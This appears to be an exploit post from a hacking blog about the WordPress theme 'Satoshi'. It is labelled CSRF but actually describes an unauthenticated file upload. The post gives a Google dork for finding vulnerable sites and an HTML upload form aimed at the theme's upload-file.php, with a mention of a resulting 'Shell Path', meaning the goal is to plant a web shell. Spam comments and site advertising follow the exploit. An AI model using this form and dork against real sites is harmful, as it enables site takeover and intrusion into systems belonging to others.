Satoshi Theme - File Upload CSRF - 3xploi7 BuG

Satoshi Theme - File Upload CSRF

#- Title: Satoshi Theme - File Upload CSRF
#- Author: Cyber_Taregh
#- Date: 2014-12-06
#- Developer : vooshtheme
#- Link Download : wpthemedownload .org/satoshi/
#- Google Dork: inurl:"/Themes/satoshi/"
#- Fixed in Version : -
#- Tested on : linux


OWASP Top 10 A8: Cross-Site Request Forgery (CSRF)

Submitter Anonymous
Views 750
Verified No

-- Proof Of Concept --

When vuln : -


<form enctype="multipart/form-data"
action="http://target .com/wp-content/themes/satoshi/upload-file.php" method="post">
Your File: <input name="uploadfile" type="file" /><br />
<input type="submit" value="upload" />

If Succes  : Succes

Shell Path : Here

3xploi7 Team

2 Responses to "Satoshi Theme - File Upload CSRF"

  1. HTML Pro Team has got an extensive expertise in PSD To Joomla Theme Conversion with the ability to work on Joomla plug-in development and customization, Shopping Cart Plug-ins, Commercial Plug-in Implementations, Display Compatibility and Schema with Load Page Speed Optimization and all you can think a Joomla based site can do. If you’re looking to build a Joomla website in a hurry/jiffy and effortlessly – our experts will slice your PSD into HTML then code a Joomla theme for your next project with 100% satisfaction!

  2. A brothel in Cologne, Germany is offering any patron who gets a tattoo of the businesses logo, by their in house artist, free entrance for life ($6.25 US) and discounts on lap dances ($25.00 US. ea)
    kit tattoo


Tempat Diskusi

Iklan Atas Artikel

3xploi7 1

dedicated server indonesia , web hosting terbaik di indonesia

3xploi7 2

Iklan Bawah Artikel

Stay toon disini ya karena artikel akan selalu di update.
Kunjungi Terus " 3xploi7 " untuk update menarik selanjutnya..

Jangan sampai Terlewatkan.

Kalo ada masalah silahkan gabung Grup..

• Join Grup Team :

 — Facebook Grup ( 4.325 Anggota )
 — Line Square